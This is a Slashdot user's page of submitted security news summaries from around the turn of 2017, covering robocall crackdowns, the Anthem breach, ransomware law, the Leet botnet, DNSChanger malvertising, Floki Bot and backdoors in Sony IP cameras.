Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!


Forgot your password?

Submission Summary: 0 pending, 955 declined, 396 accepted (1351 total, 29.31% accepted)

Check out the new SourceForge HTML5 internet speed test! No Flash necessary and runs on all devices. ×

Submission + - FTC Dismantles Two Huge Robocall Organizations

Trailrunner7 writes: Continuing its campaign against phone fraud operations, the FTC has dismantled two major robocall organizations that the commission alleges were making hundreds of millions of calls over the course of several years to consumers who were on the Do Not Call registry.

The FTC filed complaints against two separate groups of defendants, the leaders of which have both been involved in previous legal actions for robocalling operations. The defendants each controlled several different corporate entities that were involved in selling home security systems, extended auto warranties, and other products through repeated automated phone calls. Many of the calls were to numbers on the DNC list, a violation of the telemarketing regulations.

The two main defendants in the complaints are Justin Ramsey and Aaron Michael Jones, and in separate actions, they and many of their co-defendants have agreed to court-ordered bans on robocall activities and financial settlements. The FTC alleges that Ramsey directed an operation that made millions of robocalls a month.

Submission + - Foreign Government Blamed for Huge Anthem Data Breach

Trailrunner7 writes: Attackers backed by a foreign government were behind the attack that compromised health insurance company Anthem in 2015, a breach that compromised the information of more than 78 million people, according to the findings of an investigation into the attack.

The Anthem data breach is one of the larger health cae-related incidents ever in the United States and it has cost the company $260 million so far in technology improvements, credit monitoring, and other expenses. Anthem officials discovered the breach in January 2015 and disclosed it publicly the following month. The attack began, as many of the incidents do, with a spearphishing email, which an employee of one of Anthem’s subsidiaries opened. That led to the installation of malware on the employee’s machine, and the attacker then moved on to compromise at least 90 other computers in the organization, according to the report.

Anthem hired security firm CrowdStrike to investigate the intrusion, and the California Department of Insurance conducted an analysis of the event, as well. The analysts came to the conclusion that operators from a foreign government had initiated the attack. The report does not specify which government was involved, however.

Submission + - New Report Will Provide Motive, Details of Russian Hacking Tied to Election

Trailrunner7 writes: In a report to be published next week, the United States intelligence community will provide further support for its assertions that Russian intelligence services compromised government and private networks to influence the November presidential election. The report also will include details on a motive for the hacking campaign.

The new report is the result of an order from President Barack Obama to investigate whether elements of the Russian government hacked U.S. networks in the months leading up to the election. There will be a classified version of the report delivered to Congress, as well as an unclassified version released to the public. In a hearing before the Senate Armed Service Committee Thursday, senior intelligence officials said they are highly confident that Russian intelligence was behind a number of intrusions tied to the election.

“This was a multifaceted campaign. The hacking was only one part of it. It included classical propaganda, fake news, disinformation,” said Director of National Intelligence James Clapper during Thursday’s hearing.

Submission + - New California Law Finally Makes Ransomware Illegal

Trailrunner7 writes: It was nice to see the calendar turn over to 2017, for a lot of reasons, not the least of which is that on Jan. 1 a new law went into effect in California that outlaws the use of ransomware.

The idea of needing a new law to make a form of hacking illegal may seem counterintuitive, but ransomware is a case of criminals outflanking the existing laws. Ransomware emerged in a big way a few years ago and the law enforcement community was not prepared for the explosion of infections. While there have been takedowns of ransomware gangs, they often involve charges of money laundering or other crimes, not the installation of the ransomware itself.

In September, California Gov. Jerry Brown signed into law a bill that made the use of ransomware a crime, essentially a form of extortion. The law went into effect on Jan. 1.

Submission + - FDA Issues Cybersecurity Guidance for Medical Devices

Trailrunner7 writes: The Food and Drug Administration has published new recommendations for both manufacturers and regulators on how to deal with security for medical devices, including implantable devices. Calling device security a shared responsibility, the FDA guidance focuses on the postmarket cybersecurity issues, such as vulnerability response and remediation.

The new document is not a set of regulations, but is simply guidance designed to give manufacturers and regulators a framework for medical device security issues. This topic has become a major concern in the last few years as manufacturers have added networking and other capabilities to more and more medical devices such as insulin pumps and pacemakers.

A large portion of the FDA guidance concerns the ways in which manufacturers assess the potential exploitability of a given vulnerability and how they respond to vulnerability reports. There are well-defined processes for this kind of assessment in the normal software and hardware worlds. But medical devices are a much different story, given their dedicated purposes and the potential consequences if a vulnerability is exploited.

Submission + - New Leet Botnet Rivaling Mirai's DDoS Volume

Trailrunner7 writes: A new botnet that is capable of some of the larger DDoS attacks ever seen has emerged in the last few days, launching floods of up to 650 Gbps and using a unique payload that researchers say is effective at evading security systems.

The network came to light on Dec. 21 when researchers at Imperva saw a two-part DDoS attack that began with a 20-minute flood that peaked around 400 Gbps. A few minutes later, the attackers pushed the button again, this time hitting a peak volume of 650 Gbps and throwing more than 150 million packets per second at the targets. That volume of attack traffic approaches the enormous DDoS floods generated by the Mirai botnet over the last few months. The largest of the known Mirai floods was around 1 Tbps of traffic.

The Imperva researchers said the attacks from the new botnet, which they’ve named Leet, came from spoofed IP addresses and ended after a total of about 37 minutes. Aside from the high volume involved in the attacks, the other interesting piece is the makeup of the packets Leet is sending at its targets. Some of the packets are typical SYN packets, but others are more than 10 times as large as normal packets and include some very odd ingredients.

Submission + - Apple Delays App Store Security Deadline for Developers

Trailrunner7 writes: Apple has pushed back a deadline for developers to support a key transport security technology in apps submitted to the company’s app stores.

Officials said at the Apple Worldwide Developers Conference earlier this year that developers would have to support Apple Transport Security by the end of 2016. But on Thursday, the company announced that it has decided to extend the deadline indefinitely.

ATS is Apple’s collection of transport security standards designed to provide attack resistance for data that’s sent between iOS and macOS apps and back end servers. It requires apps to support a number of modern transport security technologies, including TLS 1.2, AES-128 or stronger, and certificates must be signed using SHA-2. ATS also requires the use of forward secrecy, a key-exchange method that protects encrypted sessions even if the server certificate is compromised at some point in the future.

Submission + - House Working Group Says Weakening Crypto Would Hurt U.S. Security

Trailrunner7 writes: In a year-end report, a key congressional working group on encryption said that any governmental initiative to backdoor encryption systems is against the interests of the country and that there is no clear solution to the battle over encryption right now.

The Encryption Working Group, comprised of members of the House Judiciary Committee and House Energy and Commerce Committee, has been looking at the challenges that law enforcement and intelligence communities face with the wide deployment of strong encryption. The group said in its report that although encrypted communications present a serious obstacle for law enforcement agencies, officials in the national security community said encryption is a key part of protecting the nation’s critical infrastructure.

“Congress should not weaken this vital technology because doing so works against the national interest. However, it should not ignore and must address the legitimate concerns of the law enforcement and intelligence communities,” the report says.

Submission + - Google Releases Tool to Find Common Crypto Bugs

Trailrunner7 writes: Google has released a new set of tests it uses to probe cryptographic libraries for vulnerabilities to known attacks. The tests can be used against most kinds of crypto algorithms and the company already has found 40 new weaknesses in existing algorithms.

the tests are called Project Wycheproof, and Google’s engineers designed them to help developers implement crypto libraries without having to become experts. Cryptographic libraries can be quite difficult to implement and making errors can lead to serious security problems. Attackers often will look for weak crypto implementations as a means of circumventing strong encryption in a target app.

Among the issues that Google’s engineers found with the Project Wycheproof tests is one in ECDH that allows an attacker to recover the private key in some circumstances. The bug is the result of some libraries not checking the elliptic curve points that they get from outside sources.

Submission + - 70 Percent of Enterprise Ransomware Victims Paid Up

Trailrunner7 writes: Ransomware gangs have been targeting businesses in the last few months, seeking bigger paydays than what they can extract from consumers. The plan has been highly successful, according to new data, which shows that 70 percent of businesses infected with ransomware have paid the ransom to get their data back.

Researchers at IBM Security’s X-Force surveyed executives at 600 businesses of all sizes and found that organizations hit with ransomware are choosing to pay out at a high rate. The data shows that 20 percent of compromised organizations have paid ransoms of more than $40,000, and 25 percent have paid between $20,000 and $40,000. Those numbers are far higher than what consumers typically pay, which is usually in the range of $500-$1,000, depending on the ransomware variant.

Submission + - New Wav of Malvertising Targets Home Routers, Changes DNS Servers

Trailrunner7 writes: There’s a new malvertising campaign that is attacking Chrome users on both desktops and mobile devices and is exploiting victims’ home routers through the use of the DNSChanger exploit kit. The attacks have been going on for several weeks and researchers say they’re targeting several brands of routers, including D-Link, Netgear, and others.

The attackers behind this campaign are using malicious ads on a number of legitimate websites to redirect visitors to a site that serves the exploit kit. At the start of the attack, the kit does some fingerprinting of the client and looks up its IP address to see if it’s in the range of targeted IPs. If so, it then shows the victim the malicious advertisement and uses JavaScript to pull some code from the comment field of an image in the ad. That code then sends the victim to the DNSChanger landing page. The exploit kit then loads a long encrypted list of router fingerprints and a key to decrypt them.

The kit then uses the victim’s browser to identify the home router and fingerprint it and then send the details back to the remote server. The server will then send back instructions on how to exploit that particular router. Once that's done, the malware will change the DNS server and redirect victims' web traffic.

Submission + - Zeus Still Alive and Well With New Variant Floki Bot

Trailrunner7 writes: Malware gangs, like sad wedding bands bands, love to play the hits. And one of the hits they keep running back over and over is the Zeus banking Trojan, which has been in use for many years in a number of different forms. Researchers have unearthed a new piece of malware called Floki Bot that is based on the venerable Zeus source code and is being used to infect point-of-sale systems, among other targets.

Flashpoint conducted the analysis of Floki Bot with Cisco’s Talos research team, and the two organizations said that the author behind the bot maintains a presence on a number of different underground forums, some of which are in Russian or other non-native languages for him. Kremez said that attackers sometimes will participate in foreign language forums as a way to expand their knowledge.

Along with its PoS infection capability, Floki Bot also has a feature that allows it to use the Tor network to communicate.

Submission + - Flash Bugs Dominate Exploit Kit Landscape

Trailrunner7 writes: Vulnerabilities in Flash and Internet Explorer dominated the exploit kit landscape in the last year, with a high-profile bug in Flash being found in seven separate kits, new research shows.

Exploit kits have long been a key tool in the arsenal of many attackers, from low-level gangs to highly organized cybercrime crews. Their attraction stems from their ease of use and the ability for attackers to add exploits for new vulnerabilities as needed. While there are dozens of exploit kits available, a handful of them attract the most use and attention, including Angler, Neutrino, Nuclear, and Rig. Researchers at Recorded Future looked at more than 140 exploit kits and analyzed which exploits appeared in the most kits in the last year, and it’s no surprise that Flash and IE exploits dominated the landscape.

Six of the top 10 most-refquently targeted vulnerabilities in the last year were in Flash, while the other four were in Microsoft products, including IE, Windows, and Silverlight. Flash has been a favorite target for attackers for a long time, for two main reasons: it’s deployed on hundreds of millions of machines, and it has plenty of vulnerabilities. Recorded Future’s analysis shows that trend is continuing, and one Flash bug disclosed October 2015 was incorporated into seven individual exploit kits. The flaw was used by a number of high-level attackers, including some APT groups.

Submission + - Two Backdoors Found in Sony IP Cameras

Trailrunner7 writes: A long list of IP-enabled security cameras made by Sony contain backdoors in their firmware that can allow an attacker to run arbitrary code remotely on the devices and potentially opening them up for use in a botnet.

The cameras affected by the vulnerabilities are surveillance cameras, mainly used in enterprises and retail settings and there are dozens of models that contain the vulnerable firmware. Researchers at SEC Consult discovered the backdoors and found that an attacker could use one of them to enable hidden Telnet and SSH services on the cameras and then use the other backdoor to gain root privileges.

“After enabling Telnet/SSH, another backdoor allows an attacker to gain access to a Linux shell with root privileges! The vulnerabilities are exploitable in the default configuration over the network. Exploitation over the Internet is possible, if the web interface of the device is exposed," the researchers said.

Submission + - New Google Trusted Contacts Service Shares User Location in Real Time

Trailrunner7 writes: Google has spent a lot of time and money on security over the last few years, developing new technologies and systems to protect users’ devices. One of the newer technologies the company has come up with is designed to provide security for users themselves rather than their laptops or phones.

On Monday Google launched a new app for Android called Trusted Contacts that allows users to share their locations and some limited other information with a set of close friends and family members. The system is a two-way road, so a user can actively share her location with her Trusted Contacts, and stop sharing it at her discretion. But, when a problem or potential emergency comes up, one of those contacts can request to get that user’s location to see where she is at any moment. The app is designed to give users a way to reassure contacts that they’re safe, or request help if there’s something wrong.

Slashdot Top Deals

Sometimes, too long is too long. - Joe Crowe